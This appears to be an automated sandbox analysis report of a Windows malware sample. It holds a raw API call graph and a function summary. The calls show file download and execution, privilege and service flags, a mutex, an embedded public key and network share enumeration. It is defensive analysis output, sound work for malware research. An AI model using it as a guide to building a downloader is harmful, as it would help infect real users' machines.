calls 43286->43289 43291 415f50 59 API calls 43287->43291 43294 415f50 43288->43294 43290 415001 43289->43290 43293 414fe0 43291->43293 43293->42597 43295 415f61 43294->43295 43302 415f7e 43294->43302 43296 415f75 43295->43296 43298 423b4c 59 API calls 43295->43298 43296->43302 43303 44f1bb 59 API calls 3 library calls 43296->43303 43298->43296 43302->43283 43304->42622 43305->42622 43306->42636 43335 421037 43307->43335 43309 40c78a 43309->42648 43310 420546 43309->43310 43311 420550 43310->43311 43312 420564 43310->43312 43313 425208 __fptostr 58 API calls 43311->43313 43312->42665 43314 420555 43313->43314 43535 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43314->43535 43316 420560 43316->42665 43319 42110d _doexit 43317->43319 43318 42111e 43320 425208 __fptostr 58 API calls 43318->43320 43319->43318 43321 42114c 43319->43321 43322 421123 43320->43322 43325 42112e _doexit 43321->43325 43536 420e53 43321->43536 43581 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43322->43581 43325->42665 43326 42117d 43582 4211b5 LeaveCriticalSection LeaveCriticalSection __fsopen 43326->43582 43329 42115b 43329->43326 43542 429312 43329->43542 43330->42648 43331->42650 43332->42655 43333->42658 43334->42664 43338 421043 _doexit 43335->43338 43336 421056 43337 425208 __fptostr 58 API calls 43336->43337 43339 42105b 43337->43339 43338->43336 43340 421087 43338->43340 43384 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43339->43384 43354 428df4 43340->43354 43343 42108c 43344 4210a2 43343->43344 43345 421095 43343->43345 43346 4210cc 43344->43346 43347 4210ac 43344->43347 43348 425208 __fptostr 58 API calls 43345->43348 43369 428f13 43346->43369 43349 425208 __fptostr 58 API calls 43347->43349 43351 421066 _doexit @_EH4_CallFilterFunc@8 43348->43351 43349->43351 43351->43309 43355 428e00 _doexit 43354->43355 43356 428af7 __lock 58 API calls 43355->43356 43367 428e0e 43356->43367 43357 428e82 43386 428f0a 43357->43386 43358 428e89 43359 428cde __malloc_crt 58 API calls 43358->43359 43361 428e90 43359->43361 43361->43357 43390 43263e InitializeCriticalSectionAndSpinCount 43361->43390 43362 428eff _doexit 43362->43343 43364 428b9f __mtinitlocknum 58 API calls 43364->43367 43365 420e92 _wprintf 59 API calls 43365->43367 43366 428eb6 EnterCriticalSection 43366->43357 43367->43357 43367->43358 43367->43364 43367->43365 43389 420efc LeaveCriticalSection LeaveCriticalSection _doexit 43367->43389 43378 428f33 __wopenfile 43369->43378 43370 428f4d 43372 425208 __fptostr 58 API calls 43370->43372 43371 429108 43371->43370 43376 42916b 43371->43376 43373 428f52 43372->43373 43395 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43373->43395 43375 4210d7 43385 4210f9 LeaveCriticalSection LeaveCriticalSection __fsopen 43375->43385 43392 43c214 43376->43392 43378->43370 43378->43371 43396 43c232 60 API calls 2 library calls 43378->43396 43380 429101 43380->43371 43397 43c232 60 API calls 2 library calls 43380->43397 43382 429120 43382->43371 43398 43c232 60 API calls 2 library calls 43382->43398 43384->43351 43385->43351 43391 428c81 LeaveCriticalSection 43386->43391 43388 428f11 43388->43362 43389->43367 43390->43366 43391->43388 43399 43b9f8 43392->43399 43394 43c22d 43394->43375 43395->43375 43396->43380 43397->43382 43398->43371 43401 43ba04 _doexit 43399->43401 43400 43ba1a 43402 425208 __fptostr 58 API calls 43400->43402 43401->43400 43403 43ba50 43401->43403 43404 43ba1f 43402->43404 43410 43bac1 43403->43410 43482 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43404->43482 43409 43ba29 _doexit 43409->43394 43411 43bae1 43410->43411 43484 447f50 43411->43484 43414 43c213 43415 43bafd 43416 43bb37 43415->43416 43418 43bb5a 43415->43418 43431 43bc34 43415->43431 43515 4251d4 58 API calls __getptd_noexit 43416->43515 43423 43bc18 43418->43423 43430 43bbf6 43418->43430 43419 43bb3c 43420 425208 __fptostr 58 API calls 43419->43420 43421 43bb49 43420->43421 43516 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43421->43516 43517 4251d4 58 API calls __getptd_noexit 43423->43517 43424 43ba6c 43483 43ba95 LeaveCriticalSection __unlock_fhandle 43424->43483 43426 43bc1d 43427 425208 __fptostr 58 API calls 43426->43427 43428 43bc2a 43427->43428 43518 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43428->43518 43491 43b1c2 43430->43491 43530 4242fd 8 API calls 2 library calls 43431->43530 43433 43bcc4 43434 43bcf1 43433->43434 43435 43bcce 43433->43435 43509 43b88d 43434->43509 43519 4251d4 58 API calls __getptd_noexit 43435->43519 43482->43409 43483->43409 43485 447f6f 43484->43485 43486 447f5a 43484->43486 43485->43415 43487 425208 __fptostr 58 API calls 43486->43487 43488 447f5f 43487->43488 43531 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43488->43531 43490 447f6a 43490->43415 43492 43b1ce _doexit 43491->43492 43493 428b9f __mtinitlocknum 58 API calls 43492->43493 43494 43b1df 43493->43494 43495 428af7 __lock 58 API calls 43494->43495 43496 43b1e4 _doexit 43494->43496 43505 43b1f2 43495->43505 43496->43433 43498 43b2d2 43499 428c96 __calloc_crt 58 API calls 43498->43499 43500 43b272 EnterCriticalSection 43500->43505 43501 428af7 __lock 58 API calls 43501->43505 43505->43498 43505->43500 43505->43501 43507 43b340 43505->43507 43532 43263e InitializeCriticalSectionAndSpinCount 43505->43532 43533 43b29a LeaveCriticalSection _doexit 43505->43533 43515->43419 43516->43424 43517->43426 43518->43431 43530->43414 43531->43490 43532->43505 43533->43505 43535->43316 43537 420e63 43536->43537 43538 420e85 EnterCriticalSection 43536->43538 43537->43538 43540 420e6b 43537->43540 43539 420e7b 43538->43539 43539->43329 43541 428af7 __lock 58 API calls 43540->43541 43541->43539 43543 42932b 43542->43543 43545 4294a3 43542->43545 43544 42816b __fseek_nolock 58 API calls 43543->43544 43546 429331 43544->43546 43580 42938a 43545->43580 43606 43c784 72 API calls 4 library calls 43545->43606 43548 429354 43546->43548 43549 42816b __fseek_nolock 58 API calls 43546->43549 43550 4293c0 43548->43550 43551 42936d 43548->43551 43552 42933d 43549->43552 43550->43545 43553 42816b __fseek_nolock 58 API calls 43550->43553 43554 42b2f2 __filbuf 72 API calls 43551->43554 43559 429372 43551->43559 43552->43548 43555 42816b __fseek_nolock 58 API calls 43552->43555 43556 4293d0 43553->43556 43554->43559 43557 429349 43555->43557 43558 4293f3 43556->43558 43561 42816b __fseek_nolock 58 API calls 43556->43561 43560 42816b __fseek_nolock 58 API calls 43557->43560 43558->43545 43563 42940e 43558->43563 43562 42b2f2 __filbuf 72 API calls 43559->43562 43559->43580 43560->43548 43564 4293dc 43561->43564 43562->43580 43565 429416 43563->43565 43583 42b2f2 43563->43583 43564->43558 43567 42816b __fseek_nolock 58 API calls 43564->43567 43565->43580 43603 422d33 58 API calls __isleadbyte_l 43565->43603 43569 4293e8 43567->43569 43571 42816b __fseek_nolock 58 API calls 43569->43571 43570 42943e 43572 429473 43570->43572 43574 429448 43570->43574 43576 42b2f2 __filbuf 72 API calls 43570->43576 43571->43558 43605 43c76c 60 API calls __woutput_p_l 43572->43605 43574->43572 43577 429460 43574->43577 43575 429487 43578 425208 __fptostr 58 API calls 43575->43578 43575->43580 43576->43574 43604 43c607 60 API calls 5 library calls 43577->43604 43578->43580 43580->43329 43581->43325 43582->43325 43584 42b2fd 43583->43584 43587 42b312 43583->43587 43585 425208 __fptostr 58 API calls 43584->43585 43586 42b302 43585->43586 43640 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43586->43640 43589 42b347 43587->43589 43594 42b30d 43587->43594 43641 438a16 58 API calls __malloc_crt 43587->43641 43591 42816b __fseek_nolock 58 API calls 43589->43591 43592 42b35b 43591->43592 43607 42b4b0 43592->43607 43594->43565 43603->43570 43604->43580 43605->43575 43606->43580 43608 42b4bc _doexit 43607->43608 43609 42b4e0 43608->43609 43610 42b4c9 43608->43610 43612 42b5a4 43609->43612 43614 42b4f4 43609->43614 43710 4251d4 58 API calls __getptd_noexit 43610->43710 43640->43594 43641->43589 43730 415ab8 43729->43730 43731 4159e8 43729->43731 43808 44f26c 59 API calls 3 library calls 43730->43808 43733 415ac2 43731->43733 43734 415a02 43731->43734 43735 44f23e 59 API calls 43733->43735 43736 415acc 43734->43736 43737 415a1a 43734->43737 43746 415a2a ___crtGetEnvironmentStringsW 43734->43746 43735->43736 43738 44f23e 59 API calls 43736->43738 43739 416950 59 API calls 43737->43739 43737->43746 43748 415ad6 43738->43748 43739->43746 43740 415b36 43741 415bf1 43740->43741 43742 415b49 43740->43742 43743 44f23e 59 API calls 43741->43743 43744 415b61 43742->43744 43745 415bfb 43742->43745 43752 415b71 ___crtGetEnvironmentStringsW 43742->43752 43743->43745 43749 416950 59 API calls 43744->43749 43744->43752 43747 44f23e 59 API calls 43745->43747 43746->42678 43750 415c05 43747->43750 43748->43740 43751 415b15 43748->43751 43749->43752 43753 4159d0 59 API calls 43751->43753 43752->42678 43754 415b30 43753->43754 43754->42678 43808->43733 43958 423f74 43915->43958 43918 41f196 Sleep 43919 41f1c1 43918->43919 43920 41f94b 43918->43920 43921 410a50 65 API calls 43919->43921 43922 414690 59 API calls 43920->43922 43923 41f1cd 43921->43923 43924 41f97a 43922->43924 43930 420235 _TranslateName 60 API calls 43923->43930 43934 41f216 43923->43934 44018 410160 89 API calls 5 library calls 43924->44018 43930->43923 43955 41f8af 43959 425007 _GetLcidFromLanguage 58 API calls 43958->43959 43960 41f16a Sleep 43959->43960 43960->43918 43960->43955 44122 410bd0 WNetOpenEnumW 44119->44122 44121 41fd95 SendMessageW 44123 410c33 GlobalAlloc 44122->44123 44124 410c1c 44122->44124 44128 410c45 _memset 44123->44128 44124->44121 44125 410c51 WNetEnumResourceW 44126 410ea3 WNetCloseEnum 44125->44126 44125->44128 44126->44121 44127 415c10 59 API calls 44127->44128 44128->44125 44128->44127 44129 4150c0 59 API calls 44128->44129 44130 410bd0 59 API calls 44128->44130 44131 418fd0 59 API calls 44128->44131 44129->44128 44130->44128 44131->44128 44133 41dbf6 __ftell_nolock 44132->44133 44134 413ff0 59 API calls 44133->44134 44135 41dc31 44134->44135 44136 4156d0 59 API calls 44135->44136 44137 41dc82 44136->44137 44138 413ff0 59 API calls 44137->44138 44139 41dcb1 44138->44139 44140 40ecb0 60 API calls 44139->44140 44141 41dcc5 44140->44141 44142 41dcf0 LoadLibraryW GetProcAddress 44141->44142 44156 41e3d3 44141->44156 44143 413c40 59 API calls 44142->44143 44144 41dd1a UuidCreate UuidToStringA 44143->44144 44146 41dd84 44144->44146 44146->44146 44147 4156d0 59 API calls 44146->44147 44148 41dda7 RpcStringFreeA PathAppendA CreateDirectoryA 44147->44148 44149 4184e0 59 API calls 44148->44149 44150 41de18 44149->44150 44151 413ff0 59 API calls 44150->44151 44152 41de4c 44151->44152 44153 412900 60 API calls 44152->44153 44154 41de5c 44153->44154 44155 413580 59 API calls 44154->44155 44176 41de73 _memset _wcsstr 44155->44176 44157 41deec InternetOpenA 44158 413ff0 59 API calls 44157->44158 44158->44176 44159 412900 60 API calls 44159->44176 44160 414690 59 API calls 44166 41df60 _memmove 44160->44166 44161 414690 59 API calls 44161->44176 44163 412840 60 API calls 44163->44176 44164 41e079 InternetOpenUrlA 44164->44176 44165 41e0e2 HttpQueryInfoW 44165->44176 44166->44160 44166->44176 44247 40dd40 73 API calls 4 library calls 44166->44247 44167 413ff0 59 API calls 44167->44176 44168 413010 59 API calls 44168->44176 44169 41e1ec lstrcpyA PathAppendA 44169->44176 44170 4156d0 59 API calls 44171 41e267 CreateFileA 44170->44171 44172 41e299 SetFilePointer 44171->44172 44171->44176 44172->44176 44173 41e2b1 InternetReadFile 44173->44176 44174 41e2dc WriteFile 44175 41e316 CloseHandle InternetCloseHandle InternetCloseHandle 44174->44175 44174->44176 44175->44176 44176->44156 44176->44157 44176->44159 44176->44161 44176->44163 44176->44164 44176->44165 44176->44166 44176->44167 44176->44168 44176->44169 44176->44170 44176->44173 44176->44174 44176->44175 44177 41e334 ShellExecuteA 44176->44177 44177->44176 44179 42f7c0 __ftell_nolock 44178->44179 44180 41e6b6 timeGetTime 44179->44180 44181 423f74 58 API calls 44180->44181 44182 41e6cc 44181->44182 44248 40c6a0 RegOpenKeyExW 44182->44248 44185 41e72e InternetOpenW 44189 41e6d4 _memset _strstr _wcsstr 44185->44189 44186 415ae0 59 API calls 44186->44189 44187 41ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 44187->44189 44188 41ea4c SHGetFolderPathA 44188->44189 44191 41ea67 PathAppendA DeleteFileA 44188->44191 44189->44185 44189->44186 44189->44187 44189->44188 44192 41eada lstrlenA 44189->44192 44194 41ee4d 44189->44194 44195 4156d0 59 API calls 44189->44195 44198 413ff0 59 API calls 44189->44198 44199 412900 60 API calls 44189->44199 44200 41eb53 lstrcpyW 44189->44200 44202 41eb74 lstrlenA 44189->44202 44205 4159d0 59 API calls 44189->44205 44207 41e8f3 lstrcpyW 44189->44207 44209 41e943 InternetOpenUrlW InternetReadFile 44189->44209 44210 41eb99 MultiByteToWideChar lstrcpyW 44189->44210 44213 41e7be _memmove 44189->44213 44216 41ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 44189->44216 44219 41ebf0 SHGetFolderPathA 44189->44219 44224 41ecaa lstrlenA 44189->44224 44231 41ed1f lstrcpyW 44189->44231 44233 41ed43 lstrlenA 44189->44233 44238 41ed68 MultiByteToWideChar lstrcpyW lstrlenW 44189->44238 44242 41edc3 SHGetFolderPathA 44189->44242 44245 420bed 58 API calls _free 44189->44245 44253 40c500 SHGetFolderPathA 44189->44253 44273 411b10 timeGetTime timeGetTime 44189->44273 44191->44189 44192->44189 44193 414690 59 API calls 44193->44213 44196 40ef50 58 API calls 44194->44196 44195->44189 44201 41ee5d 44196->44201 44198->44189 44199->44189 44200->44189 44200->44202 44203 413ea0 59 API calls 44201->44203 44206 41eeb1 44201->44206 44204 420c62 _malloc 58 API calls 44202->44204 44203->44201 44204->44189 44205->44189 44208 40ef50 58 API calls 44206->44208 44207->44189 44207->44209 44218 41eec1 44208->44218 44211 41e9ec InternetCloseHandle InternetCloseHandle 44209->44211 44212 41e97c SHGetFolderPathA 44209->44212 44210->44189 44211->44213 44212->44211 44214 41e996 PathAppendA 44212->44214 44213->44189 44213->44193 44213->44211 44215 41e93c lstrcatW 44213->44215 44222 41e9c4 lstrlenA 44213->44222 44279 40dd40 73 API calls 4 library calls 44213->44279 44284 423a38 83 API calls 5 library calls 44213->44284 44280 4220b6 44214->44280 44215->44209 44216->44189 44220 413ea0 59 API calls 44218->44220 44225 41ef12 44218->44225 44219->44189 44221 41ec17 PathAppendA DeleteFileA 44219->44221 44220->44218 44221->44189 44283 422b02 80 API calls 3 library calls 44222->44283 44224->44189 44227 413ff0 59 API calls 44225->44227 44228 41ef3a 44227->44228 44229 412900 60 API calls 44228->44229 44230 41ef45 lstrcpyW 44229->44230 44235 41ef6a 44230->44235 44231->44189 44231->44233 44234 420c62 _malloc 58 API calls 44233->44234 44234->44189 44236 413ff0 59 API calls 44235->44236 44237 41ef9f 44236->44237 44239 412900 60 API calls 44237->44239 44238->44189 44240 41edad lstrlenW 44238->44240 44241 41efac lstrcpyW 44239->44241 44240->44189 44246 41ee44 44240->44246 44241->44246 44242->44189 44244 41edea PathAppendA DeleteFileA 44242->44244 44244->44189 44245->44189 44247->44166 44249 40c734 44248->44249 44250 40c6cc RegQueryValueExW 44248->44250 44249->44189 44251 40c70c RegSetValueExW RegCloseKey 44250->44251 44252 40c6fd RegCloseKey 44250->44252 44251->44249 44252->44189 44254 40c525 44253->44254 44255 40c52c PathAppendA 44253->44255 44254->44189 44256 4220b6 125 API calls 44255->44256 44257 40c550 44256->44257 44258 40c559 44257->44258 44285 42387f 85 API calls 5 library calls 44257->44285 44258->44189 44260 40c56c 44286 423455 69 API calls 4 library calls 44260->44286 44262 40c572 44287 420cf4 84 API calls 6 library calls 44262->44287 44264 40c57a 44265 40c5a5 44264->44265 44267 40c589 44264->44267 44290 423a38 83 API calls 5 library calls 44265->44290 44288 4222f5 74 API calls __fread_nolock 44267->44288 44268 40c5ab 44268->44189 44270 40c593 44289 423a38 83 API calls 5 library calls 44270->44289 44272 40c599 44272->44189 44274 411b2f 44273->44274 44278 411b7f 44273->44278 44275 411b40 PeekMessageW 44274->44275 44277 411b58 DispatchMessageW PeekMessageW 44274->44277 44274->44278 44275->44274 44276 411b70 Sleep timeGetTime 44275->44276 44276->44275 44276->44278 44277->44274 44277->44276 44278->44189 44279->44213 44291 421ff2 44280->44291 44282 4220c6 44282->44213 44283->44213 44284->44213 44285->44260 44286->44262 44287->44264 44288->44270 44289->44272 44290->44268 44294 421ffe _doexit 44291->44294 44292 422010 44293 425208 __fptostr 58 API calls 44292->44293 44295 422015 44293->44295 44294->44292 44296 42203d 44294->44296 44310 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44295->44310 44298 428df4 __getstream 61 API calls 44296->44298 44299 422042 44298->44299 44300 42204b 44299->44300 44301 422058 44299->44301 44302 425208 __fptostr 58 API calls 44300->44302 44303 422081 44301->44303 44304 422061 44301->44304 44306 422020 _doexit @_EH4_CallFilterFunc@8 44302->44306 44311 42b078 44303->44311 44307 425208 __fptostr 58 API calls 44304->44307 44306->44282 44307->44306 44310->44306 44319 42b095 44311->44319 44312 42b0a9 44313 425208 __fptostr 58 API calls 44312->44313 44314 42b0ae 44313->44314 44329 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44314->44329 44315 42b2ac 44334 43fba6 44315->44334 44318 42208c 44328 4220ae LeaveCriticalSection LeaveCriticalSection __fsopen 44318->44328 44319->44312 44327 42b250 44319->44327 44330 43fbc4 58 API calls __mbsnbcmp_l 44319->44330 44321 42b216 44321->44312 44331 43fcf3 65 API calls __mbsnbicmp_l 44321->44331 44323 42b249 44323->44327 44332 43fcf3 65 API calls __mbsnbicmp_l 44323->44332 44325 42b268 44325->44327 44333 43fcf3 65 API calls __mbsnbicmp_l 44325->44333 44327->44312 44327->44315 44328->44306 44329->44318 44330->44321 44331->44323 44332->44325 44333->44327 44337 43fa8f 44334->44337 44336 43fbbf 44336->44318 44340 43fa9b _doexit 44337->44340 44338 43fab1 44339 425208 __fptostr 58 API calls 44338->44339 44341 43fab6 44339->44341 44340->44338 44342 43fae7 44340->44342 44348 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44341->44348 44349 43fb58 44342->44349 44347 43fac0 _doexit 44347->44336 44348->44347 44357 427970 44349->44357 44352 43bac1 __wsopen_nolock 109 API calls 44353 43fb92 44352->44353 44354 420bed _free 58 API calls 44353->44354 44355 43fb03 44354->44355 44356 43fb2c LeaveCriticalSection __unlock_fhandle 44355->44356 44356->44347 44358 427993 44357->44358 44359 42797d 44357->44359 44358->44359 44360 42799a ___crtIsPackagedApp 44358->44360 44361 425208 __fptostr 58 API calls 44359->44361 44365 4279a3 AreFileApisANSI 44360->44365 44366 4279b0 MultiByteToWideChar 44360->44366 44362 427982 44361->44362 44378 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44362->44378 44364 42798c 44364->44352 44364->44355 44365->44366 44367 4279ad 44365->44367 44368 4279ca GetLastError 44366->44368 44369 4279db 44366->44369 44367->44366 44379 4251e7 58 API calls 3 library calls 44368->44379 44371 428cde __malloc_crt 58 API calls 44369->44371 44372 4279e3 44371->44372 44372->44364 44373 4279ea MultiByteToWideChar 44372->44373 44373->44364 44374 427a00 GetLastError 44373->44374 44380 4251e7 58 API calls 3 library calls 44374->44380 44376 427a0c 44377 420bed _free 58 API calls 44376->44377 44377->44364 44378->44364 44379->44364 44380->44376 44382 427e1a _doexit 44381->44382 44383 428af7 __lock 51 API calls 44382->44383 44384 427e21 44383->44384 44385 427e4f DecodePointer 44384->44385 44389 427eda _doexit 44384->44389 44387 427e66 DecodePointer 44385->44387 44385->44389 44394 427e76 44387->44394 44401 427f28 44389->44401 44390 427f37 _doexit 44390->42371 44392 427e83 EncodePointer 44392->44394 44393 427f1f 44395 427b0b _doexit 3 API calls 44393->44395 44394->44389 44394->44392 44396 427e93 DecodePointer EncodePointer 44394->44396 44399 427ea5 DecodePointer DecodePointer 44394->44399 44397 427f28 44395->44397 44396->44394 44398 427f35 44397->44398 44406 428c81 LeaveCriticalSection 44397->44406 44398->42371 44399->44394 44402 427f08 44401->44402 44403 427f2e 44401->44403 44402->44390 44405 428c81 LeaveCriticalSection 44402->44405 44407 428c81 LeaveCriticalSection 44403->44407 44405->44393 44406->44398 44407->44402 44408 481920 44409 42f7c0 __ftell_nolock 44408->44409 44410 481943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 44409->44410 44411 481a0b 44410->44411 44412 4819e2 GetProcAddress GetProcAddress 44410->44412 44413 481aab 44411->44413 44416 481a1b NetStatisticsGet 44411->44416 44412->44411 44414 481acb 44413->44414 44415 481ac4 FreeLibrary 44413->44415 44417 481ad5 GetProcAddress GetProcAddress GetProcAddress 44414->44417 44443 481b0d __ftell_nolock 44414->44443 44415->44414 44418 481a69 NetStatisticsGet 44416->44418 44419 481a33 __ftell_nolock 44416->44419 44417->44443 44418->44413 44420 481a87 __ftell_nolock 44418->44420 44422 45d550 101 API calls 44419->44422 44426 45d550 101 API calls 44420->44426 44421 481bee 44423 481c1b 44421->44423 44424 481c14 FreeLibrary 44421->44424 44425 481a5a 44422->44425 44427 481c31 LoadLibraryA 44423->44427 44428 481c24 44423->44428 44424->44423 44425->44418 44426->44413 44430 481c4a GetProcAddress GetProcAddress GetProcAddress 44427->44430 44431 481d4b 44427->44431 44508 4549a0 13 API calls 4 library calls 44428->44508 44441 481c84 __ftell_nolock 44430->44441 44447 481cac __ftell_nolock 44430->44447 44433 481d59 12 API calls 44431->44433 44434 48223f 44431->44434 44432 481c29 44432->44427 44432->44431 44435 481e5c 44433->44435 44436 482233 FreeLibrary 44433->44436 44496 482470 44434->44496 44435->44436 44457 481ed9 CreateToolhelp32Snapshot 44435->44457 44436->44434 44439 481d3f FreeLibrary 44439->44431 44440 48225b __ftell_nolock 44442 45d550 101 API calls 44440->44442 44444 45d550 101 API calls 44441->44444 44446 482276 GetCurrentProcessId 44442->44446 44443->44421 44449 45d550 101 API calls 44443->44449 44453 481b7c __ftell_nolock 44443->44453 44444->44447 44445 481d03 __ftell_nolock 44445->44439 44450 45d550 101 API calls 44445->44450 44448 48228f __ftell_nolock 44446->44448 44447->44445 44452 45d550 101 API calls 44447->44452 44454 45d550 101 API calls 44448->44454 44449->44453 44451 481d3c 44450->44451 44451->44439 44452->44445 44453->44421 44455 45d550 101 API calls 44453->44455 44456 4822aa 44454->44456 44455->44421 44458 42a77e CatchGuardHandler 6 API calls 44456->44458 44457->44436 44460 481ef0 44457->44460 44459 4822ca 44458->44459 44461 481f03 GetTickCount 44460->44461 44462 481f15 Heap32ListFirst 44460->44462 44461->44462 44463 482081 44462->44463 44468 481f28 __ftell_nolock 44462->44468 44464 48209d Process32First 44463->44464 44465 482095 GetTickCount 44463->44465 44466 48210a 44464->44466 44473 4820b4 __ftell_nolock 44464->44473 44465->44464 44467 482118 GetTickCount 44466->44467 44481 482120 __ftell_nolock 44466->44481 44467->44481 44468->44463 44475 48204e Heap32ListNext 44468->44475 44476 482066 GetTickCount 44468->44476 44480 45d550 101 API calls 44468->44480 44486 481ff1 GetTickCount 44468->44486 44490 45d550 44468->44490 44470 481f56 Heap32First 44470->44468 44471 45d550 101 API calls 44471->44473 44472 482196 44474 4821a4 GetTickCount 44472->44474 44487 4821ac __ftell_nolock 44472->44487 44473->44466 44473->44471 44477 4820fb GetTickCount 44473->44477 44474->44487 44475->44463 44475->44468 44476->44463 44476->44468 44477->44466 44477->44473 44478 482219 44483 482229 44478->44483 44484 48222d CloseHandle 44478->44484 44479 45d550 101 API calls 44479->44481 44482 481fd9 Heap32Next 44480->44482 44481->44472 44481->44479 44488 482187 GetTickCount 44481->44488 44482->44468 44483->44436 44484->44436 44485 45d550 101 API calls 44485->44487 44486->44468 44487->44478 44487->44485 44489 48220a GetTickCount 44487->44489 44488->44472 44488->44481 44489->44478 44489->44487 44491 45d559 44490->44491 44494 45d57d __ftell_nolock 44490->44494 44509 46b5d0 101 API calls __except_handler4 44491->44509 44493 45d55f 44493->44494 44510 45a5e0 101 API calls __except_handler4 44493->44510 44494->44470 44497 48247a __ftell_nolock 44496->44497 44498 4824c3 GetTickCount 44497->44498 44499 482483 QueryPerformanceCounter 44497->44499 44500 4824d6 __ftell_nolock 44498->44500 44501 482499 __ftell_nolock 44499->44501 44502 482492 44499->44502 44503 45d550 101 API calls 44500->44503 44504 45d550 101 API calls 44501->44504 44502->44498 44505 4824ea 44503->44505 44506 4824b7 44504->44506 44507 482244 GlobalMemoryStatus 44505->44507 44506->44498 44506->44507 44507->44440 44508->44432 44509->44493 44510->44494

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00419F90 Relevance: 178.3, APIs: 65, Strings: 36, Instructions: 1565COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                      • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                      • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0071AE58,?), ref: 0041A0BB
                                                                                                                                                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                                                                    • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                                                                      • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                      • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                      • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                    • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                                                                    • API String ID: 2957410896-774485112
                                                                                                                                                    • Opcode ID: d9cb4fcdbc06a44fded90cc65729b0119b31344de380d50bd6db6bdc4660ab98
                                                                                                                                                    • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                                                                    • Opcode Fuzzy Hash: d9cb4fcdbc06a44fded90cc65729b0119b31344de380d50bd6db6bdc4660ab98
                                                                                                                                                    • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00481920 Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587libraryloadermemoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
